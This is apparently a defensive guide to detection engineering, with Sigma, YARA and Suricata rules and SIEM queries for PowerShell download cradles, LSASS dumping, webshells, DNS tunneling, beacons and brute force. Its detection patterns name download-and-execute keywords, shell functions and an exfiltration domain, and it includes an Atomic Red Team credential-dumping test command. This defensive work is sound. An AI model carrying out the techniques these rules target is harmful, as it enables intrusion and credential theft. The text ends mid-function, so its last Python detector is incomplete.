Introduction

Detection engineering has evolved from writing simple SIEM queries to a disciplined engineering practice focused on building robust, scalable, and effective threat detection systems. In 2026, organizations face sophisticated adversaries who leverage living-off-the-land techniques, fileless malware, and cloud-native attacks that traditional signature-based detection cannot catch.

This guide covers modern detection engineering practices, including detection-as-code methodologies, advanced SIEM rule development, behavioral analytics, and threat hunting frameworks that form the foundation of effective defensive security operations.


1. Modern Threat Detection Landscape 2026

The Evolution of Detection Engineering

Traditional approach (legacy):

  • Signature-based detection
  • Static IOC matching
  • Vendor-specific rule formats
  • Manual rule creation and deployment

Modern approach (2026):

  • Behavior-based detection
  • Detection-as-code with version control
  • Platform-agnostic formats (Sigma)
  • Automated testing and deployment pipelines
  • Machine learning augmentation
  • Continuous validation and tuning

Detection Pyramid Framework

          [Threat Intelligence]
         [Behavioral Analytics]
        [  Correlation Rules   ]
       [  Signature Detection   ]

Each layer serves a purpose:

  • Signatures: Fast, low false-positive detection of known threats
  • Correlation: Context-aware detection combining multiple events
  • Behavioral: Anomaly detection based on baselines
  • Threat Intelligence: External IOC enrichment and validation

Key Metrics for Detection Effectiveness

Primary metrics:

  • Mean Time to Detect (MTTD): Average time from compromise to detection
  • Mean Time to Respond (MTTR): Average time from detection to containment
  • True Positive Rate: Percentage of real threats detected
  • False Positive Rate: Noise vs. signal ratio
  • Detection Coverage: Percentage of MITRE ATT&CK techniques covered

Target goals 2026:

  • MTTD: < 15 minutes for critical threats
  • MTTR: < 1 hour for critical incidents
  • True Positive Rate: > 85%
  • False Positive Rate: < 5%
  • ATT&CK Coverage: > 70% of relevant techniques
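MTTD and MTTR are straightforward to compute from incident records. A minimal sketch in Python; the incident tuples and their timestamps are hypothetical:

```python
from datetime import datetime, timedelta

def mean_delta(pairs):
    """Average timedelta across (start, end) timestamp pairs."""
    deltas = [end - start for start, end in pairs]
    return sum(deltas, timedelta()) / len(deltas)

# Hypothetical incident records: (compromise, detection, containment)
incidents = [
    (datetime(2026, 1, 5, 9, 0),  datetime(2026, 1, 5, 9, 10),  datetime(2026, 1, 5, 9, 50)),
    (datetime(2026, 1, 7, 14, 0), datetime(2026, 1, 7, 14, 20), datetime(2026, 1, 7, 15, 10)),
]

mttd = mean_delta([(c, d) for c, d, _ in incidents])  # compromise -> detection
mttr = mean_delta([(d, r) for _, d, r in incidents])  # detection -> containment

print(f"MTTD: {mttd}, MTTR: {mttr}")
```

In practice these timestamps come from your case-management system; the point is to track the deltas per incident, not just averages, so regressions surface quickly.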

2. SIEM Platform Essentials

Platform Comparison 2026

Splunk Enterprise Security:

  • Strengths: Mature detection framework, extensive app ecosystem
  • Best for: Large enterprises with dedicated SOC teams
  • Detection format: SPL (Search Processing Language)

Elastic Security (ELK Stack):

  • Strengths: Open-source, highly customizable, excellent scalability
  • Best for: Organizations with engineering resources
  • Detection format: KQL (Kibana Query Language) + Detection Rules API

Microsoft Sentinel:

  • Strengths: Native Azure integration, low operational overhead
  • Best for: Cloud-first organizations using Microsoft ecosystem
  • Detection format: KQL + Analytics Rules

Wazuh:

  • Strengths: Open-source, lightweight, integrated HIDS/NIDS
  • Best for: Budget-conscious organizations, hybrid environments
  • Detection format: XML rules + Sigma integration

Log Source Architecture

Critical log sources for detection:

┌─────────────────────────────────────────────┐
│         Windows Security Events             │
│  - 4624 (Logon), 4625 (Failed Logon)       │
│  - 4688 (Process Creation)                 │
│  - 4720 (Account Created)                  │
│  - 4732 (User Added to Group)              │
└─────────────────────────────────────────────┘

┌─────────────────────────────────────────────┐
│         Sysmon (Enhanced Windows)           │
│  - Event ID 1 (Process Creation)           │
│  - Event ID 3 (Network Connection)         │
│  - Event ID 7 (Image Loaded)               │
│  - Event ID 10 (Process Access)            │
└─────────────────────────────────────────────┘

┌─────────────────────────────────────────────┐
│         Linux Audit Logs                    │
│  - /var/log/auth.log (authentication)      │
│  - /var/log/audit/audit.log (syscalls)     │
│  - Process execution (execve)              │
└─────────────────────────────────────────────┘

┌─────────────────────────────────────────────┐
│         Network Traffic                     │
│  - Firewall logs (allow/deny)              │
│  - DNS queries (potential C2)              │
│  - Proxy logs (web traffic)                │
│  - IDS/IPS alerts (Suricata/Snort)         │
└─────────────────────────────────────────────┘

┌─────────────────────────────────────────────┐
│         Cloud Platform Logs                 │
│  - AWS CloudTrail (API calls)              │
│  - Azure Activity Log (resource changes)   │
│  - GCP Audit Logs (admin activity)         │
│  - Container runtime logs                  │
└─────────────────────────────────────────────┘

Image suggestion: Log source architecture diagram showing collection points, aggregation, and SIEM ingestion flow.

Log Enrichment Strategy

Raw logs lack context. Enrich before detection:

Original log:
  src_ip: 192.168.1.100
  dst_ip: 10.0.5.50
  dst_port: 445

Enriched log:
  src_ip: 192.168.1.100
  src_hostname: WORKSTATION-042
  src_user: jsmith
  src_department: Finance
  dst_ip: 10.0.5.50
  dst_hostname: DC-PRIMARY
  dst_service: SMB
  dst_port: 445
  geo_country: US
  threat_intel_match: false
  asset_criticality: high

Enrichment sources:

  • CMDB/Asset inventory
  • Active Directory/LDAP
  • Threat intelligence feeds
  • GeoIP databases
  • User/Entity Behavior Analytics (UEBA)
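Enrichment itself is a simple join against context sources. A minimal Python sketch, using hypothetical in-memory tables standing in for the CMDB, AD/LDAP, and threat-intel feeds:

```python
# Hypothetical lookup tables (in production: CMDB, AD/LDAP, TI feeds)
ASSET_DB = {
    "10.0.5.50": {"hostname": "DC-PRIMARY", "criticality": "high"},
    "192.168.1.100": {"hostname": "WORKSTATION-042", "criticality": "low"},
}
TI_BLOCKLIST = {"203.0.113.7"}

def enrich(event):
    """Return a copy of the event with asset and threat-intel context added."""
    enriched = dict(event)
    for side in ("src", "dst"):
        asset = ASSET_DB.get(event.get(f"{side}_ip"), {})
        if asset:
            enriched[f"{side}_hostname"] = asset["hostname"]
    dst_asset = ASSET_DB.get(event.get("dst_ip"), {})
    enriched["asset_criticality"] = dst_asset.get("criticality", "unknown")
    enriched["threat_intel_match"] = event.get("dst_ip") in TI_BLOCKLIST
    return enriched

event = {"src_ip": "192.168.1.100", "dst_ip": "10.0.5.50", "dst_port": 445}
print(enrich(event))
```

Run enrichment at ingest time (before rules evaluate), so detections can filter on fields like asset_criticality directly.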

3. Sigma Rule Development

What is Sigma?

Sigma is a generic signature format for SIEM systems, allowing detection rules to be written once and converted to multiple SIEM query languages.

Benefits:

  • Platform-agnostic detection content
  • Version control and collaboration (GitHub)
  • Community-driven rule repository
  • Automated conversion to target SIEM
  • Easier testing and validation

Sigma Rule Anatomy

Basic structure:

title: Suspicious PowerShell Download Execution
id: 3b6ab547-8ec2-4991-b9d2-2b06702a3d7c
status: experimental
description: Detects PowerShell downloading and executing content from the internet
author: Detection Team
date: 2025/01/15
modified: 2025/01/15
tags:
  - attack.execution
  - attack.t1059.001  # PowerShell
  - attack.defense_evasion
  - attack.t1140      # Deobfuscate/Decode Files
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith: '\powershell.exe'
  selection_cli:
    CommandLine|contains:
      - 'IEX'
      - 'Invoke-Expression'
      - 'DownloadString'
      - 'DownloadFile'
      - 'Net.WebClient'
      - 'Start-BitsTransfer'
  condition: selection_img and selection_cli
falsepositives:
  - Legitimate software updates
  - IT administration scripts
level: high

Detection logic: This rule identifies PowerShell processes executing download operations by matching the process image (powershell.exe) combined with command-line arguments containing download or execution keywords. The selection_img ensures it’s PowerShell, while selection_cli catches common download methods like DownloadString (fetch web content), IEX (Invoke-Expression for executing downloaded code), and Start-BitsTransfer (BITS service for file transfers). Both conditions must be met (and operator) to trigger an alert.

Why it works: Attackers commonly use PowerShell for initial payload execution because it’s pre-installed on Windows and can download/execute code in memory without touching disk. This pattern is seen in phishing campaigns, living-off-the-land attacks, and post-exploitation activity.

Key components:

  • logsource: Defines which logs this rule applies to (process creation events from Windows)
  • detection: Boolean logic for matching events (both image AND command-line must match)
  • falsepositives: Known benign scenarios that may trigger alerts
  • level: Severity rating (high = requires prompt investigation)

Advanced Sigma Techniques

Time-based correlation:

title: Multiple Failed Logins Followed by Success
id: a5b8ecef-4a91-4b0c-86d4-9f7f8c0eaf01
detection:
  selection_failed:
    EventID: 4625
    TargetUserName: '*'
  selection_success:
    EventID: 4624
    TargetUserName: '*'
  timeframe: 5m
  condition: selection_failed | count(TargetUserName) > 5 and selection_success

Note: This is a conceptual example of time-based correlation. Standard Sigma doesn’t natively support temporal correlation with count() and timeframe in this exact syntax. This pattern must be implemented directly in your SIEM platform.

Detection logic: Identifies potential brute force authentication attacks by detecting more than 5 failed login attempts (Event ID 4625) for the same username within a 5-minute window, followed by a successful login (Event ID 4624). This pattern suggests an attacker successfully guessed credentials after multiple attempts.

Implementation examples:

Splunk SPL:

index=windows EventCode=4625 OR EventCode=4624
| bin _time span=5m
| stats count(eval(EventCode=4625)) as failed, 
        count(eval(EventCode=4624)) as success 
        by _time, TargetUserName
| where failed > 5 AND success > 0

Elastic Detection Rule:

sequence by user.name with maxspan=5m
  [authentication where event.outcome == "failure"] with runs=6
  [authentication where event.outcome == "success"]

Field aggregation:

title: Suspicious Process Parent-Child Relationship
detection:
  selection:
    ParentImage|endswith: '\winword.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\wscript.exe'
      - '\cscript.exe'
  condition: selection

Detection logic: Detects Microsoft Word spawning command interpreters or scripting engines, a common indicator of malicious macros or exploit documents. Legitimate Word documents rarely need to execute PowerShell, cmd.exe, or script hosts. This pattern is frequently seen in phishing campaigns where macro-enabled documents download and execute payloads.

Why this matters: When Word executes these processes, it typically means:

  • A macro is running malicious code
  • An exploit (like equation editor vulnerability) triggered
  • A user opened a weaponized document

Common attack flow:

  1. User receives phishing email with .docm attachment
  2. User enables macros (often via social engineering)
  3. Macro executes PowerShell to download additional malware
  4. This rule triggers on step 3

Sigma conversion to SIEM:

# Convert to Splunk SPL
sigmac -t splunk -c tools/config/generic/sysmon.yml rules/windows/process_creation/

# Convert to Elastic Query DSL
sigmac -t es-qs -c tools/config/winlogbeat.yml rules/

# Convert to Microsoft Sentinel KQL
sigmac -t ala -c tools/config/generic/sysmon.yml rules/

# Convert to QRadar AQL
sigmac -t qradar -c tools/config/generic/sysmon.yml rules/

Note: The legacy sigmac converter shown above has been superseded by the pySigma-based sigma-cli (sigma convert -t <backend>); the workflow is the same, but conversion backends are installed as separate pySigma plugins.

Detection Rule Testing Framework

Atomic Red Team integration:

# Rule: detect_mimikatz_usage.yml
title: Mimikatz Credential Dumping Detection

# Test with Atomic Red Team
test_command: |
  Invoke-AtomicTest T1003.001 -TestNumber 1
  # Should trigger: Sysmon Event ID 10 access to lsass.exe
    
expected_events:
  - EventID: 10
    TargetImage: '*\lsass.exe'
    GrantedAccess: '0x1010'

Detection validation: This demonstrates how to test Sigma rules using Atomic Red Team, a framework that safely simulates attack techniques. The command Invoke-AtomicTest T1003.001 executes a controlled test of LSASS credential dumping (Mimikatz technique).

Expected behavior:

  • EventID 10: Sysmon Process Access event (monitors when one process accesses another’s memory)
  • TargetImage: lsass.exe (Local Security Authority Subsystem Service - stores credentials)
  • GrantedAccess 0x1010: Hexadecimal access rights breakdown:
    • 0x1000 = PROCESS_QUERY_LIMITED_INFORMATION (query basic process info)
    • 0x0010 = PROCESS_VM_READ (read process memory)
    • Combined (0x1000 | 0x0010 = 0x1010) = ability to read credentials from LSASS memory
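The access-mask arithmetic can be verified in a few lines of Python; the flag values are from the Windows SDK (winnt.h):

```python
# Windows process access rights (values from winnt.h)
FLAGS = {
    "PROCESS_VM_READ": 0x0010,
    "PROCESS_QUERY_LIMITED_INFORMATION": 0x1000,
}

def decode_access(mask, flags):
    """Return the names of the access-right flags set in mask."""
    return [name for name, value in flags.items() if mask & value]

granted = 0x1010
print(decode_access(granted, FLAGS))
# 0x1000 | 0x0010 == 0x1010, so both rights are present
```

The same decoding approach works for triaging any Sysmon Event ID 10 alert: expand GrantedAccess into named rights before deciding whether the access pattern is credential-theft-capable.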

Why test with Atomic: Validates your detection works before real attacks occur. If this test doesn’t trigger your alert, your detection has a gap.

Continuous validation pipeline:

# Conceptual pipeline: exact command names vary by toolchain
# (e.g., sigma-cli provides `sigma check` for syntax validation)

# 1. Validate Sigma syntax
sigma-validator rules/*.yml

# 2. Test conversion to all platforms
sigmac -t splunk,elastic,sentinel rules/*.yml

# 3. Run against test dataset
sigma-test rules/*.yml --dataset test-logs/

# 4. Check coverage
sigma-coverage rules/ --mitre-attack

4. YARA Rules for Malware Detection

YARA Rule Structure

YARA identifies and classifies malware based on textual or binary patterns.

Basic malware detection:

rule Cobalt_Strike_Beacon {
    meta:
        description = "Detects Cobalt Strike Beacon payloads"
        author = "Detection Team"
        date = "2025-01-15"
        hash = "5d2a4cde9fa7c2fdbf39b2e2faa23fea"
        severity = "critical"
        
    strings:
        $mz = "MZ"
        $beacon_config = { 00 01 00 01 00 02 }
        $sleep_mask = "sleep_mask"
        $http_get = "GET /" ascii wide
        $http_post = "POST /" ascii wide
        $user_agent = "User-Agent:" ascii wide
        
    condition:
        $mz at 0 and 
        3 of ($beacon_config, $sleep_mask, $http_get, $http_post, $user_agent)
}

Detection logic: Identifies Cobalt Strike Beacon payloads by combining PE file structure validation with Beacon-specific artifacts:

String breakdown:

  • $mz = "MZ": DOS header signature (all Windows executables start with this)
  • $beacon_config = { 00 01 00 01 00 02 }: Byte sequence from Beacon’s configuration block
  • $sleep_mask: Feature string for Beacon’s sleep obfuscation functionality
  • $http_get / $http_post: HTTP method strings used for C2 communication
  • $user_agent: HTTP header string for beacon callbacks

Modifiers:

  • ascii: Match ASCII-encoded strings
  • wide: Match Unicode (UTF-16) strings
  • Both together: Search for strings in either encoding

Condition logic:

  • $mz at 0: MZ header MUST be at file offset 0 (validates PE structure)
  • 3 of (...): At least 3 of the listed strings must be present
  • This reduces false positives from legitimate HTTP libraries while catching most Beacon variants

Use cases: Scan files on disk, memory dumps, network captures (PCAP), or uploaded files.

Advanced pattern matching:

rule Webshell_Generic_Detection {
    meta:
        description = "Generic webshell detection using suspicious function combinations"
        author = "Detection Team"
        
    strings:
        // PHP webshell indicators
        $php_exec = /exec\s*\(/ nocase
        $php_system = /system\s*\(/ nocase
        $php_shell = /shell_exec\s*\(/ nocase
        $php_passthru = /passthru\s*\(/ nocase
        $php_eval = /eval\s*\(/ nocase
        $php_base64 = "base64_decode" nocase
        
        // Suspicious network functions
        $php_socket = "fsockopen" nocase
        $php_curl = "curl_exec" nocase
        
        // File operations
        $php_upload = "$_FILES" nocase
        $php_include = /include\s*\(/ nocase
        
    condition:
        (2 of ($php_exec, $php_system, $php_shell, $php_passthru)) and
        ($php_base64 or $php_eval) and
        (filesize < 100KB)
}

Detection logic: Catches generic PHP webshells by identifying suspicious function combinations rather than specific webshell variants. This behavioral approach detects both known and unknown webshells.

Why these functions matter:

  • Command execution (exec, system, shell_exec, passthru): Allow executing operating system commands
  • Obfuscation (base64_decode, eval): Attackers encode malicious code to evade detection
  • Network functions (fsockopen, curl_exec): Enable reverse shells and data exfiltration
  • File operations ($_FILES, include): File upload and remote code inclusion

Regex explanation:

  • /exec\s*\(/: Matches exec followed by any amount of whitespace and an opening parenthesis (exec(, exec (, etc.)
  • nocase: Case-insensitive matching (catches EXEC(), Exec(), etc.)

Condition logic:

  1. At least 2 command execution functions (strong indicator of malicious intent)
  2. AND either obfuscation method (attackers hide their code)
  3. AND file smaller than 100KB (webshells are typically small; excludes large legitimate PHP applications)

Why this works: Legitimate PHP applications rarely combine command execution with obfuscation in small files. Webshells need these capabilities for remote access and evasion.
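The same heuristic translates outside YARA. A minimal Python scorer with the stdlib re module, mirroring the rule's condition logic (function lists and thresholds follow the rule above; the sample strings are illustrative):

```python
import re

EXEC_FUNCS = [r"exec\s*\(", r"system\s*\(", r"shell_exec\s*\(", r"passthru\s*\("]
OBFUSCATION = [r"base64_decode", r"eval\s*\("]

def looks_like_webshell(source: str, max_size=100 * 1024) -> bool:
    """Mirror the YARA condition: 2+ exec functions AND obfuscation AND small file."""
    if len(source.encode()) >= max_size:
        return False
    exec_hits = sum(bool(re.search(p, source, re.IGNORECASE)) for p in EXEC_FUNCS)
    obfuscated = any(re.search(p, source, re.IGNORECASE) for p in OBFUSCATION)
    return exec_hits >= 2 and obfuscated

shell = '<?php eval(base64_decode($_POST["c"])); system($_GET["x"]); exec($_GET["y"]); ?>'
print(looks_like_webshell(shell))            # suspicious sample
print(looks_like_webshell("<?php echo 1;"))  # benign sample
```

A scorer like this is useful in CI for web-root scanning where deploying YARA is impractical, though YARA remains faster and more expressive for production scanning.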

Memory scanning for process injection:

rule Process_Injection_Reflective_DLL {
    meta:
        description = "Detects reflective DLL injection in memory"
        
    strings:
        $api1 = "VirtualAlloc" ascii wide
        $api2 = "VirtualProtect" ascii wide
        $api3 = "WriteProcessMemory" ascii wide
        $api4 = "CreateRemoteThread" ascii wide
        $api5 = "NtQueueApcThread" ascii wide
        
        $pattern1 = { 4D 5A ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 50 45 }
        $pattern2 = { 55 89 E5 83 EC ?? 89 ?? ?? 8B ?? ?? E8 }
        
    condition:
        3 of ($api*) and any of ($pattern*)
}

Detection logic: Identifies process injection techniques by detecting Windows API function strings combined with PE file patterns in process memory. Reflective DLL injection loads malicious code into another process’s memory without writing to disk.

API functions explained:

  • VirtualAlloc: Allocates memory in target process
  • VirtualProtect: Changes memory permissions (e.g., from read-only to executable)
  • WriteProcessMemory: Writes malicious code into allocated memory
  • CreateRemoteThread: Executes injected code by creating a thread in target process
  • NtQueueApcThread: Alternative execution method using Asynchronous Procedure Call

Binary patterns:

  • $pattern1: PE header signature

    • 4D 5A = “MZ” (DOS header)
    • ?? = wildcard bytes (variable data)
    • 50 45 = “PE” (PE header marker)
    • Detects PE files loaded in memory without being on disk
  • $pattern2: x86 function prologue (assembly)

    • 55 = push ebp (save base pointer)
    • 89 E5 = mov ebp, esp (set up stack frame)
    • 83 EC = sub esp, ?? (allocate stack space)
    • Common pattern at start of injected functions

Condition: At least 3 API functions AND any binary pattern must be present. This catches both the injection mechanism (APIs) and the payload (PE structure).

Use case: Scan process memory dumps, monitor running processes, or analyze malware samples. Common in fileless malware, APT activity, and post-exploitation tools.
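The PE structure that $pattern1 approximates can be validated exactly: the true PE header offset is stored in the e_lfanew field at offset 0x3C, which is why the YARA pattern needs wildcard bytes. A stdlib-only Python sketch (the synthetic buffer is illustrative):

```python
import struct

def is_pe(data: bytes) -> bool:
    """Check for a valid DOS header and a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    # e_lfanew: 4-byte little-endian offset of the PE header, stored at 0x3C
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    return data[pe_offset:pe_offset + 4] == b"PE\x00\x00"

# Minimal synthetic buffer: MZ header, e_lfanew = 0x40, PE signature at 0x40
buf = bytearray(0x44)
buf[:2] = b"MZ"
struct.pack_into("<I", buf, 0x3C, 0x40)
buf[0x40:0x44] = b"PE\x00\x00"
print(is_pe(bytes(buf)))
```

Memory scanners apply exactly this check to allocated regions: an MZ/PE pair in a region that maps to no file on disk is a strong injection indicator.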

Image suggestion: YARA rule matching process showing string patterns, PE header analysis, and detection logic flow.

YARA Integration with SIEM

Scanning files from log events:

import json
import logging
from datetime import datetime

import yara  # pip install yara-python

# Load and compile YARA rules once at startup
rules = yara.compile(filepath='malware_rules.yar')

def scan_file_event(file_path):
    """Scan file mentioned in security event"""
    try:
        matches = rules.match(filepath=file_path)
        if matches:
            alert = {
                "timestamp": datetime.now().isoformat(),
                "file_path": file_path,
                "yara_matches": [str(m) for m in matches],
                "severity": "high",
                "action_required": "quarantine"
            }
            # send_to_siem is your forwarder (e.g., syslog or HTTP event collector)
            send_to_siem(json.dumps(alert))
            return True
    except Exception as e:
        logging.error(f"YARA scan failed: {e}")
    return False

Automated scanning pipeline:

# Monitor file creation events
# When new file detected, scan with YARA

ossec.conf (Wazuh's main configuration file):
<localfile>
  <log_format>syslog</log_format>
  <location>/var/log/file_creation.log</location>
</localfile>

<active-response>
  <command>yara-scan</command>
  <location>local</location>
  <rules_id>554</rules_id>
</active-response>

5. Network IDS Signatures (Suricata/Snort)

Suricata Rule Format

Suricata provides high-performance network threat detection.

Basic HTTP malware download detection:

alert http any any -> any any (
    msg:"Possible Malware Download - Executable via HTTP";
    flow:established,to_client;
    file_data;
    content:"MZ"; offset:0; depth:2;
    content:"This program cannot be run in DOS mode";
    classtype:trojan-activity;
    sid:1000001;
    rev:1;
)

Detection logic: Identifies Windows executable files (PE format) being downloaded over unencrypted HTTP by inspecting the file content for PE header signatures.

Rule components:

  • alert http: Trigger on HTTP protocol traffic
  • any any -> any any: Match any source/destination (bidirectional)
  • flow:established,to_client: Only inspect established TCP connections with data flowing TO the client (downloads)
  • file_data: Inspect HTTP response body (not headers)
  • content:"MZ"; offset:0; depth:2:
    • “MZ” is the DOS header signature (first 2 bytes of all Windows PE files)
    • offset:0 = start at beginning of file
    • depth:2 = only check first 2 bytes for efficiency
  • content:"This program cannot be run in DOS mode": Standard DOS stub message in PE files
  • classtype:trojan-activity: Categorize as malware-related
  • sid:1000001: Unique signature identifier (1000000+ for custom rules)
  • rev:1: Revision number

Why this works: Legitimate software should be downloaded over HTTPS in 2026. HTTP downloads of executables are suspicious and often indicate malware distribution or compromised websites.

Limitations: Won’t detect HTTPS downloads (encrypted traffic). Consider using TLS inspection or endpoint monitoring for complete coverage.

DNS tunneling detection:

alert dns any any -> any any (
    msg:"Possible DNS Tunneling - Excessive Subdomain Length";
    dns.query;
    content:".";
    pcre:"/[a-z0-9]{50,}\./i";
    threshold:type both, track by_src, count 10, seconds 60;
    classtype:policy-violation;
    sid:1000002;
    rev:1;
)

Detection logic: Identifies DNS tunneling by detecting unusually long subdomain labels, a common indicator of data exfiltration through DNS queries.

How DNS tunneling works:

  • Normal DNS: www.example.com (short, readable labels)
  • DNS tunneling: 48656c6c6f576f726c64.attacker.com (data encoded as subdomain)
  • Attackers encode data (files, commands) into subdomain names to bypass network security

Rule components:

  • dns.query: Inspect DNS query packets (outbound requests, not responses)
  • content:".": Ensure there’s at least one dot (domain separator)
  • pcre:"/[a-z0-9]{50,}\./i": Regular expression explained:
    • [a-z0-9] = alphanumeric characters
    • {50,} = 50 or more consecutive characters
    • \. = followed by a literal dot
    • /i = case-insensitive flag
    • Matches subdomains with 50+ character labels
  • threshold:type both, track by_src, count 10, seconds 60:
    • type both = alert AND rate-limit
    • track by_src = count per source IP
    • count 10 = trigger after 10 matches
    • seconds 60 = within 60-second window
    • Effect: Alert only if one IP makes 10+ long DNS queries per minute

Why threshold matters: Single long DNS query could be legitimate (long subdomain). Multiple queries indicate tunneling activity.

Tuning recommendations:

  • Adjust length from 50 to match your environment (some CDNs use long subdomains)
  • Whitelist known services with long DNS names
  • Monitor for patterns: tunneling creates bursts of similar-length queries
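The long-label heuristic, plus Shannon entropy (which also catches encoded data in shorter labels), can be prototyped in Python with the stdlib only; the length and entropy thresholds are illustrative and should be tuned per environment:

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits per character; random or encoded data scores high."""
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

def suspicious_query(qname: str, max_label=50, entropy_threshold=3.5) -> bool:
    """Flag queries with very long or high-entropy subdomain labels."""
    labels = qname.rstrip(".").split(".")[:-2]  # ignore registered domain + TLD
    return any(len(label) >= max_label or
               (len(label) >= 16 and shannon_entropy(label) >= entropy_threshold)
               for label in labels)

print(suspicious_query("www.example.com"))
print(suspicious_query("a" * 60 + ".attacker.com"))
```

Note the second check: real tunneling tools often keep labels under length limits but use base32/hex encodings, which the entropy test catches where raw length does not.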

Cobalt Strike C2 communication:

alert http any any -> any any (
    msg:"Cobalt Strike Beacon HTTP GET Request";
    flow:established,to_server;
    content:"GET"; http_method;
    content:"/activity"; http_uri; depth:9;
    http.accept; content:"text/html,application/xhtml+xml"; depth:32;
    http.accept_language; content:!"en";
    classtype:trojan-activity;
    reference:url,attack.mitre.org/software/S0154;
    sid:1000003;
    rev:2;
)

Detection logic: Identifies Cobalt Strike Beacon HTTP GET requests by matching default URI patterns and HTTP headers commonly used in Beacon profiles.

Rule components:

  • flow:established,to_server: Monitor client-to-server traffic (beacon callbacks)
  • content:"GET"; http_method: Match HTTP GET requests specifically
  • content:"/activity"; http_uri; depth:9:
    • “/activity” is a default Beacon URI (also common: /pixel.gif, /match)
    • depth:9 = check only first 9 characters of URI for efficiency
  • http.accept; content:"text/html,application/xhtml+xml":
    • Default Beacon Accept header
    • Real browsers include more content types
  • http.accept_language; content:!"en":
    • ! = NOT operator
    • Beacon often omits Accept-Language or uses non-standard values
    • Legitimate browsers always send this header

Why this works: Cobalt Strike uses specific default HTTP profiles. While these can be customized, many operators use defaults for convenience.

Important note: This signature catches DEFAULT Beacon profiles. Sophisticated attackers customize their Beacon profiles to blend with legitimate traffic. Use this as one detection layer, not the only one.

Recommended improvements:

  • Add JA3/JA3S fingerprinting for TLS beacons
  • Monitor for regular callback intervals (beacons check in periodically)
  • Combine with endpoint detection (process creating network connections)
  • Update URI patterns based on observed Beacon profiles in your environment
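The "regular callback interval" heuristic above can be sketched by measuring jitter in connection inter-arrival times; the jitter threshold and sample timestamps are illustrative:

```python
import statistics

def looks_like_beacon(timestamps, min_events=6, max_jitter_ratio=0.1):
    """Flag hosts whose outbound connections arrive at near-constant intervals.
    timestamps: sorted epoch seconds of connections to one destination."""
    if len(timestamps) < min_events:
        return False
    intervals = [b - a for a, b in zip(timestamps, timestamps[1:])]
    mean = statistics.mean(intervals)
    if mean == 0:
        return False
    # Low coefficient of variation = suspiciously regular check-ins
    return statistics.pstdev(intervals) / mean <= max_jitter_ratio

beacon = [0, 60, 121, 180, 241, 300, 360]   # ~60s check-ins, slight jitter
browsing = [0, 3, 45, 46, 200, 210, 600]    # bursty human traffic
print(looks_like_beacon(beacon), looks_like_beacon(browsing))
```

Beacon operators add configurable jitter precisely to defeat this, so widen max_jitter_ratio cautiously and combine the score with destination reputation rather than alerting on regularity alone.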

Image suggestion: Network traffic analysis diagram showing packet inspection, signature matching, and alert generation flow.

Advanced Detection Techniques

TLS/SSL certificate anomalies:

alert tls any any -> any any (
    msg:"Suspicious Self-Signed Certificate Detected";
    tls.cert_subject; content:"CN=localhost";
    tls.cert_chain_len:<2;
    classtype:policy-violation;
    sid:1000004;
    rev:1;
)

Detection logic: Identifies self-signed TLS certificates with suspicious Common Names, often used by malware C2 servers, penetration testing tools, or hastily configured malicious infrastructure.

Rule components:

  • alert tls: Trigger on TLS/SSL protocol traffic
  • tls.cert_subject; content:"CN=localhost":
    • Inspect certificate subject field
    • Match Common Name (CN) = “localhost”
    • Production systems should never use “localhost” in certificates
  • tls.cert_chain_len:<2:
    • Certificate chain length less than 2
    • Self-signed certs have chain length of 1 (no intermediate CA)
    • Legitimate certificates have chain: Server cert → Intermediate CA → Root CA (length ≥ 2)

Why this matters:

  • Legitimate services use certificates signed by trusted Certificate Authorities (CA)
  • Attackers/malware often use self-signed certificates because:
    • Free and instant (no CA validation required)
    • Don’t care about browser warnings
    • Quick to set up for C2 infrastructure
  • Common malicious CNs: localhost, example.com, test, default, or attacker-controlled domains

Common sources of this alert:

  • Cobalt Strike team servers (default self-signed cert)
  • Metasploit handlers
  • Custom C2 frameworks
  • Reverse shells with TLS
  • Internal testing tools accidentally exposed

Tuning recommendations:

  • Whitelist known internal services with self-signed certs (development environments)
  • Add additional suspicious CN patterns: “example.com”, “test”, “default”
  • Correlate with destination IPs (self-signed cert + unknown external IP = high priority)

Protocol anomaly detection:

alert tcp any any -> any 22 (
    msg:"Possible SSH Brute Force Attack";
    flow:to_server;
    flags:S;
    threshold:type both, track by_src, count 20, seconds 60;
    classtype:attempted-admin;
    sid:1000005;
    rev:1;
)

Detection logic: Identifies SSH brute force attacks by detecting excessive connection attempts from a single source to SSH servers (port 22).

Rule components:

  • alert tcp: Monitor TCP protocol
  • any any -> any 22: Any source → any destination on port 22 (SSH)
  • flow:to_server: Traffic flowing TO the server (client initiating connections)
  • flags:S:
    • Match TCP SYN flag
    • SYN = connection initiation packet
    • Each connection attempt starts with SYN
  • threshold:type both, track by_src, count 20, seconds 60:
    • Alert if one source IP makes 20+ SSH connection attempts within 60 seconds
    • type both = alert AND rate-limit to avoid alert flooding

Why this works:

  • Legitimate users: 1-2 SSH connections per minute (normal usage)
  • Brute force tools: 10-100+ connections per minute (trying many passwords rapidly)

Attack pattern:

  1. Attacker targets SSH server with weak credentials
  2. Tool (hydra, medusa, patator) tries thousands of username/password combinations
  3. Each attempt = new TCP connection → SYN packet
  4. This rule catches the rapid connection burst

Tuning recommendations:

  • Adjust count based on your environment (20 is moderate; decrease for tighter security)
  • Whitelist trusted admin IPs (automated deployments may trigger this)
  • Combine with failed authentication logs from SSH server for higher fidelity
  • Consider lowering threshold to 10 for internet-facing SSH servers

Next steps after alert:

  • Check source IP reputation (known attacker IP?)
  • Review SSH logs for successful authentications
  • Block source IP at firewall if confirmed malicious
  • Implement SSH key-based auth instead of passwords
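Correlating with the server's failed-authentication log, as recommended above, can be prototyped as a sliding-window counter; the event format (epoch seconds, source IP) and threshold are illustrative:

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 60
THRESHOLD = 20

def detect_bruteforce(events):
    """events: time-ordered iterable of (epoch_seconds, src_ip) failed-auth tuples.
    Yields (timestamp, src_ip) once a source exceeds THRESHOLD failures per window."""
    recent = defaultdict(deque)
    alerted = set()
    for ts, src in events:
        q = recent[src]
        q.append(ts)
        # Drop failures that fell out of the sliding window
        while q and ts - q[0] > WINDOW_SECONDS:
            q.popleft()
        if len(q) >= THRESHOLD and src not in alerted:
            alerted.add(src)
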